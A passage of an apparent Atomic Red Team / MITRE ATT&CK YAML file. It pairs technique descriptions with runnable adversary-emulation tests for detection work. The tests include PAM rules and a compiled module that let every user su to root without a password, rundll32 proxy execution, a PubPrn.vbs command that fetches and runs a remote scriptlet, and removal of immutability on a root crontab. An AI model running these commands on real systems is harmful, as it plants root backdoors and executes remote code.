This technique is documented by Levan Abesadze - https://medium.com/@Wolverineisstillalive/system-binary-proxy-execution-rundll32-bypass-method-790871e1f2b7
supported_platforms:
- windows
input_arguments:
command_to_execute:
description: Command for rundll32.exe to execute
type: string
default: calc.exe
executor:
command: 'rundll32.exe url.dll,FileProtocolHandler #{command_to_execute}
'
name: command_prompt
- name: Rundll32 execute payload by calling RouteTheCall
auto_generated_guid: 8a7f56ee-10e7-444c-a139-0109438288eb
description: |
Launch an executable payload by calling RouteTheCall. Test execution of a command using rundll32.exe to execute a payload{calc.exe} by calling RouteTheCall. Upon execution, calc.exe will be launched.
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Zipfldr.yml
supported_platforms:
- windows
input_arguments:
exe_to_launch:
description: Path of the executable to launch
type: path
default: "'%windir%\\System32\\calc.exe'"
executor:
command: rundll32.exe zipfldr.dll,RouteTheCall "#{exe_to_launch}"
cleanup_command:
name: powershell
elevation_required: false
T1027.009:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1
created: '2022-09-30T18:50:14.351Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/009
external_id: T1027.009
- source_name: GitHub PSImage
description: Barrett Adams . (n.d.). Invoke-PSImage . Retrieved September
30, 2022.
url: https://github.com/peewpw/Invoke-PSImage
- source_name: Malware Analysis Report ComRAT
description: 'CISA. (2020, October 29). Malware Analysis Report (AR20-303A)
MAR-10310246-2.v1 – PowerShell Script: ComRAT. Retrieved September 30, 2022.'
url: https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a
- source_name: Trend Micro
description: Karen Victor. (2020, May 18). Reflective Loading Runs Netwalker
Fileless Ransomware. Retrieved September 30, 2022.
url: https://www.trendmicro.com/en_us/research/20/e/netwalker-fileless-ransomware-injected-via-reflective-loading.html
- source_name: Securelist Dtrack2
description: KONSTANTIN ZYKOV. (2019, September 23). Hello! My name is Dtrack.
Retrieved September 30, 2022.
url: https://securelist.com/my-name-is-dtrack/93338/
- source_name: Microsoft Learn
description: Microsoft. (2021, April 6). 2.5 ExtraData. Retrieved September
30, 2022.
url: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/c41e062d-f764-4f13-bd4f-ea812ab9a4d1
- source_name: SentinelLabs reversing run-only applescripts 2021
description: Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing
Malicious Run-Only AppleScripts. Retrieved September 29, 2022.
url: https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/
- source_name: Sentinel Labs
description: Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing
Malicious Run-Only AppleScripts. Retrieved September 30, 2022.
url: https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:03.051Z'
name: Embedded Payloads
description: "Adversaries may embed payloads within other files to conceal malicious
content from defenses. Otherwise seemingly benign files (such as scripts and
executables) may be abused to carry and obfuscate malicious payloads and content.
In some cases, embedded payloads may also enable adversaries to [Subvert Trust
Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution
controls such as digital signatures and notarization tickets.(Citation: Sentinel
Labs) \n\nAdversaries may embed payloads in various file formats to hide payloads.(Citation:
Microsoft Learn) This is similar to [Steganography](https://attack.mitre.org/techniques/T1027/003),
though does not involve weaving malicious content into specific bytes and
patterns related to legitimate digital media formats.(Citation: GitHub PSImage)
\n\nFor example, adversaries have been observed embedding payloads within
or as an overlay of an otherwise benign binary.(Citation: Securelist Dtrack2)
Adversaries have also been observed nesting payloads (such as executables
and run-only scripts) inside a file of the same format.(Citation: SentinelLabs
reversing run-only applescripts 2021) \n\nEmbedded content may also be used
as [Process Injection](https://attack.mitre.org/techniques/T1055) payloads
used to infect benign system processes.(Citation: Trend Micro) These embedded
then injected payloads may be used as part of the modules of malware designed
to provide specific features such as encrypting C2 communications in support
of an orchestrator module. For example, an embedded module may be injected
into default browsers, allowing adversaries to then communicate via the network.(Citation:
Malware Analysis Report ComRAT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Nick Cairns, @grotezinfosec
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.2'
atomic_tests: []
T1556.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
created: '2020-06-26T04:01:09.648Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1556/003
external_id: T1556.003
- source_name: Apple PAM
description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
Retrieved June 25, 2020.
url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- source_name: Man Pam_Unix
description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
25, 2020.
url: https://linux.die.net/man/8/pam_unix
- source_name: PAM Creds
description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
PAM backdoors & DNS requests. Retrieved November 17, 2024.
url: https://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- source_name: Red Hat PAM
description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
(PAM). Retrieved June 25, 2020.
url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- source_name: PAM Backdoor
description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
25, 2020.
url: https://github.com/zephrax/linux-pam-backdoor
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:21.118Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
Adversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)
Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Scott Knight, @sdotknight, VMware Carbon Black
- George Allen, VMware Carbon Black
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
x_mitre_version: '2.1'
identifier: T1556.003
atomic_tests:
- name: Malicious PAM rule
auto_generated_guid: 4b9dde80-ae22-44b1-a82a-644bf009eb9c
description: |
Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
supported_platforms:
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
type: string
default: "/etc/pam.d/su-l"
pam_rule:
description: Rule to add to the PAM config.
type: string
default: auth sufficient pam_succeed_if.so uid >= 0
index:
description: Index where the rule is inserted.
type: integer
default: 1
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
'
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
'
- name: Malicious PAM rule (freebsd)
auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3
description: |
Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
supported_platforms:
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
type: string
default: "/etc/pam.d/su"
pam_rule:
description: Rule to add to the PAM config.
type: string
default: auth sufficient pam_succeed_if.so uid >= 0
index:
description: Index where the rule is inserted.
type: integer
default: 8
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
'
cleanup_command: 'sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf}
'
- name: Malicious PAM module
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
description: |
Creates a PAM module, inserts a rule to use it, and then tests it.
Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
supported_platforms:
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
type: string
default: "/etc/pam.d/su-l"
pam_rule:
description: Rule to add to the PAM config.
type: string
default: auth sufficient /tmp/pam_evil.so
index:
description: Index where the rule is inserted.
type: integer
default: 1
path_to_pam_module_source:
description: Path to PAM module source code.
type: path
default: PathToAtomicsFolder/T1556.003/src/pam_evil.c
path_to_pam_module:
description: Path to PAM module object
type: path
default: "/tmp/pam_evil.so"
dependencies:
- description: 'The PAM development library must be installed to build the PAM
module
'
prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit
0; else exit 1; fi;
'
get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install
libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel;
fi
'
- description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module})
'
prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1;
fi;
'
get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
'
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
'
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
'
T1578.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1
created: '2020-06-16T18:42:20.734Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1578/004
external_id: T1578.004
- source_name: Tech Republic - Restore AWS Snapshots
description: Hardiman, N.. (2012, March 20). Backing up and restoring snapshots
on Amazon EC2 machines. Retrieved October 8, 2019.
url: https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/
- source_name: Google - Restore Cloud Snapshot
description: Google. (2019, October 7). Restoring and deleting persistent
disk snapshots. Retrieved October 8, 2019.
url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:21.210Z'
name: Revert Cloud Instance
description: |-
An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Netskope
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
x_mitre_version: '1.2'
atomic_tests: []
T1564.012:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9
created: '2024-03-29T16:59:10.374Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1564/012
external_id: T1564.012
- source_name: Microsoft File Folder Exclusions
description: Microsoft. (2024, February 27). Contextual file and folder exclusions.
Retrieved March 29, 2024.
url: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-contextual-file-folder-exclusions-microsoft-defender-antivirus
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T22:35:31.731Z'
name: File/Path Exclusions
description: |-
Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate.(Citation: Microsoft File Folder Exclusions)
Adversaries may abuse these exclusions to hide their file-based artifacts. For example, rather than tampering with tool settings to add a new exclusion (i.e., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)), adversaries may drop their file-based payloads in default or otherwise well-known exclusions. Adversaries may also use [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) and other [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) activities to both discover and verify existing exclusions in a victim environment.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.0'
atomic_tests: []
T1222.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345
created: '2020-02-04T19:24:27.774Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1222/002
external_id: T1222.002
- source_name: Hybrid Analysis Icacls1 June 2018
description: Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe.
Retrieved August 19, 2018.
url: https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
- source_name: Hybrid Analysis Icacls2 May 2018
description: Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll.
Retrieved August 19, 2018.
url: https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110
- source_name: 20 macOS Common Tools and Techniques
description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:21.839Z'
name: 'File and Directory Permissions Modification: FreeBSD, Linux and Mac File
and Directory Permissions Modification'
description: "Adversaries may modify file or directory permissions/attributes
to evade access control lists (ACLs) and access protected files.(Citation:
Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018)
File and directory permissions are commonly managed by ACLs configured by
the file or directory owner, or users with the appropriate permissions. File
and directory ACL implementations vary by platform, but generally explicitly
designate which users or groups can perform which actions (read, write, execute,
etc.).\n\nMost Linux and Linux-based platforms provide a standard set of permission
groups (user, group, and other) and a standard set of permissions (read, write,
and execute) that are applied to each group. While nuances of each platform’s
permissions implementation may vary, most of the platforms provide two primary
commands used to manipulate file and directory ACLs: chown (short
for change owner), and chmod (short for change mode).\n\nAdversarial
may use these commands to make themselves the owner of files and directories
or change the mode if current permissions allow it. They could subsequently
lock others out of the file. Specific file and directory modifications may
be a required step for many techniques, such as establishing Persistence via
[Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004)
or tainting/hijacking other instrumental binary/configuration files via [Hijack
Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS
Common Tools and Techniques) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
- Linux
x_mitre_version: '1.2'
identifier: T1222.002
atomic_tests:
- name: chmod - Change file or folder mode (numeric mode)
auto_generated_guid: 34ca1464-de9d-40c6-8c77-690adf36a135
description: 'Changes a file or folder''s permissions using chmod and a specified
numeric mode.
'
supported_platforms:
- linux
- macos
input_arguments:
numeric_mode:
description: Specified numeric mode value
type: integer
default: 755
file_or_folder:
description: Path of the file or folder
type: path
default: "/tmp/AtomicRedTeam/atomics/T1222.002"
executor:
command: 'chmod #{numeric_mode} #{file_or_folder}
'
name: sh
- name: chmod - Change file or folder mode (symbolic mode)
auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3
description: 'Changes a file or folder''s permissions using chmod and a specified
symbolic mode.
'
supported_platforms:
- linux
- macos
input_arguments:
symbolic_mode:
description: Specified symbolic mode value
type: string
default: a+w
file_or_folder:
description: Path of the file or folder
type: path
default: "/tmp/AtomicRedTeam/atomics/T1222.002"
executor:
command: 'chmod #{symbolic_mode} #{file_or_folder}
'
name: sh
- name: chmod - Change file or folder mode (numeric mode) recursively
auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4
description: 'Changes a file or folder''s permissions recursively using chmod
and a specified numeric mode.
'
supported_platforms:
- linux
- macos
input_arguments:
numeric_mode:
description: Specified numeric mode value
type: integer
default: 755
file_or_folder:
description: Path of the file or folder
type: path
default: "/tmp/AtomicRedTeam/atomics/T1222.002"
executor:
command: 'chmod -R #{numeric_mode} #{file_or_folder}
'
name: sh
- name: chmod - Change file or folder mode (symbolic mode) recursively
auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f
description: 'Changes a file or folder''s permissions recursively using chmod
and a specified symbolic mode.
'
supported_platforms:
- linux
- macos
input_arguments:
symbolic_mode:
description: Specified symbolic mode value
type: string
default: a+w
file_or_folder:
description: Path of the file or folder
type: path
default: "/tmp/AtomicRedTeam/atomics/T1222.002"
executor:
command: 'chmod -R #{symbolic_mode} #{file_or_folder}
'
name: bash
- name: chown - Change file or folder ownership and group
auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0
description: 'Changes a file or folder''s ownership and group information using
chown.
'
supported_platforms:
- macos
- linux
input_arguments:
owner:
description: Username of desired owner
type: string
default: root
file_or_folder:
description: Path of the file or folder
type: path
default: "/tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml"
group:
description: Group name of desired group
type: string
default: root
executor:
command: 'chown #{owner}:#{group} #{file_or_folder}
'
name: bash
- name: chown - Change file or folder ownership and group recursively
auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848
description: 'Changes a file or folder''s ownership and group information recursively
using chown.
'
supported_platforms:
- macos
- linux
input_arguments:
owner:
description: Username of desired owner
type: string
default: root
file_or_folder:
description: Path of the file or folder
type: path
default: "/tmp/AtomicRedTeam/atomics/T1222.002"
group:
description: Group name of desired group
type: string
default: root
executor:
command: 'chown -R #{owner}:#{group} #{file_or_folder}
'
name: bash
- name: chown - Change file or folder mode ownership only
auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99
description: 'Changes a file or folder''s ownership only using chown.
'
supported_platforms:
- linux
- macos
input_arguments:
owner:
description: Username of desired owner
type: string
default: root
file_or_folder:
description: Path of the file or folder
type: path
default: "/tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml"
executor:
command: 'chown #{owner} #{file_or_folder}
'
name: sh
- name: chown - Change file or folder ownership recursively
auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2
description: 'Changes a file or folder''s ownership only recursively using chown.
'
supported_platforms:
- macos
- linux
input_arguments:
owner:
description: Username of desired owner
type: string
default: root
file_or_folder:
description: Path of the file or folder
type: path
default: "/tmp/AtomicRedTeam/atomics/T1222.002"
executor:
command: 'chown -R #{owner} #{file_or_folder}
'
name: bash
- name: chattr - Remove immutable file attribute
auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f
description: |
Remove's a file's `immutable` attribute using `chattr`.
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
supported_platforms:
- macos
- linux
input_arguments:
file_to_modify:
description: Path of the file
type: path
default: "/var/spool/cron/root"
executor:
command: 'chattr -i #{file_to_modify}
'
name: sh
- name: chflags - Remove immutable file attribute
auto_generated_guid: 60eee3ea-2ebd-453b-a666-c52ce08d2709
description: |
Remove's a file's `immutable` attribute using `chflags`.
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
supported_platforms:
- linux
input_arguments:
file_to_modify:
description: Path of the file
type: path
default: "/tmp/T1222.002.txt"
executor:
command: |
touch #{file_to_modify}
chflags simmutable #{file_to_modify}
chflags nosimmutable #{file_to_modify}
name: sh
- name: Chmod through c script
auto_generated_guid: 973631cf-6680-4ffa-a053-045e1b6b67ab
description: 'chmods a file using a c script
'
supported_platforms:
- macos
- linux
input_arguments:
source_file:
description: Path of c source file
type: path
default: PathToAtomicsFolder/T1222.002/src/T1222.002.c
compiled_file:
description: Path of compiled file
type: path
default: "/tmp/T1222002"
dependency_executor_name: sh
dependencies:
- description: 'Compile the script from (#{source_file}). Destination is #{compiled_file}
'
prereq_command: 'gcc #{source_file} -o #{compiled_file}
'
get_prereq_command: 'gcc #{source_file} -o #{compiled_file}
'
executor:
command: "#{compiled_file} /tmp/ T1222002\n"
name: sh
- name: Chmod through c script (freebsd)
auto_generated_guid: da40b5fe-3098-4b3b-a410-ff177e49ee2e
description: 'chmods a file using a c script
'
supported_platforms:
- linux
input_arguments:
source_file:
description: Path of c source file
type: path
default: PathToAtomicsFolder/T1222.002/src/T1222.002.c
compiled_file:
description: Path of compiled file
type: path
default: "/tmp/T1222002"
dependency_executor_name: sh
dependencies:
- description: 'Compile the script from (#{source_file}). Destination is #{compiled_file}
'
prereq_command: 'cc #{source_file} -o #{compiled_file}
'
get_prereq_command: 'cc #{source_file} -o #{compiled_file}
'
executor:
command: "#{compiled_file} /tmp/ T1222002\n"
name: sh
- name: Chown through c script
auto_generated_guid: 18592ba1-5f88-4e3c-abc8-ab1c6042e389
description: 'chowns a file to root using a c script
'
supported_platforms:
- macos
- linux
input_arguments:
source_file:
description: Path of c source file
type: path
default: PathToAtomicsFolder/T1222.002/src/chown.c
compiled_file:
description: Path of compiled file
type: path
default: "/tmp/T1222002own"
dependency_executor_name: sh
dependencies:
- description: 'Compile the script from (#{source_file}). Destination is #{compiled_file}
'
prereq_command: 'gcc #{source_file} -o #{compiled_file}
'
get_prereq_command: 'gcc #{source_file} -o #{compiled_file}
'
executor:
command: 'sudo #{compiled_file} #{source_file}
'
name: sh
elevation_required: true
- name: Chown through c script (freebsd)
auto_generated_guid: eb577a19-b730-4918-9b03-c5edcf51dc4e
description: 'chowns a file to root using a c script
'
supported_platforms:
- linux
input_arguments:
source_file:
description: Path of c source file
type: path
default: PathToAtomicsFolder/T1222.002/src/chown.c
compiled_file:
description: Path of compiled file
type: path
default: "/tmp/T1222002own"
dependency_executor_name: sh
dependencies:
- description: 'Compile the script from (#{source_file}). Destination is #{compiled_file}
'
prereq_command: 'cc #{source_file} -o #{compiled_file}
'
get_prereq_command: 'cc #{source_file} -o #{compiled_file}
'
executor:
command: "#{compiled_file} #{source_file}\n"
name: sh
elevation_required: true
T1216.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58
created: '2020-02-03T16:49:57.788Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1216/001
external_id: T1216.001
- source_name: pubprn
description: Jason Gerend. (2017, October 16). pubprn. Retrieved July 23,
2021.
url: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn
- source_name: Enigma0x3 PubPrn Bypass
description: 'Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved
April 9, 2018.'
url: https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:22.022Z'
name: 'Signed Script Proxy Execution: Pubprn'
description: |-
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Atul Nair, Qualys
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1216.001
atomic_tests:
- name: PubPrn.vbs Signed Script Bypass
auto_generated_guid: 9dd29a1f-1e16-4862-be83-913b10a88f6c
description: 'Executes the signed PubPrn.vbs script with options to download
and execute an arbitrary payload.
'
supported_platforms:
- windows
input_arguments:
remote_payload:
description: A remote payload to execute using PubPrn.vbs.
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct
executor:
command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
localhost "script:#{remote_payload}"
'
name: command_prompt
T1574.007:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
created: '2020-03-13T14:10:43.424Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/007
external_id: T1574.007
- source_name: Elastic Rules macOS launchctl 2022
description: Elastic Security 7.17. (2022, February 1). Modification of Environment
Variable via Launchctl. Retrieved September 28, 2023.
url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-4-modification-of-environment-variable-via-launchctl.html
- source_name: ExpressVPN PATH env Windows 2021
description: 'ExpressVPN Security Team. (2021, November 16). Cybersecurity
lessons: A PATH vulnerability in Windows. Retrieved September 28, 2023.'
url: https://www.expressvpn.com/blog/cybersecurity-lessons-a-path-vulnerability-in-windows/
- source_name: uptycs Fake POC linux malware 2023
description: 'Nischay Hegde and Siddartha Malladi. (2023, July 12). PoC Exploit:
Fake Proof of Concept with Backdoor Malware. Retrieved September 28, 2023.'
url: https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware
- source_name: nixCraft macOS PATH variables
description: Vivek Gite. (2023, August 22). MacOS – Set / Change $PATH Variable
Command. Retrieved September 28, 2023.
url: https://www.cyberciti.biz/faq/appleosx-bash-unix-change-set-path-environment-variable/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:22.736Z'
name: Path Interception by PATH Environment Variable
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables used to load libraries. The PATH environment variable
contains a list of directories (User and System) that the OS searches sequentially
through in search of the binary that was called from a script or the command
line. \n\nAdversaries can place a malicious program in an earlier entry in
the list of directories stored in the PATH environment variable, resulting
in the operating system executing the malicious binary rather than the legitimate
binary when it searches sequentially through that PATH listing.\n\nFor example,
on Windows if an adversary places a malicious program named \"net.exe\" in
`C:\\example path`, which by default precedes `C:\\Windows\\system32\\net.exe`
in the PATH environment variable, when \"net\" is executed from the command-line
the `C:\\example path` will be called instead of the system's legitimate executable
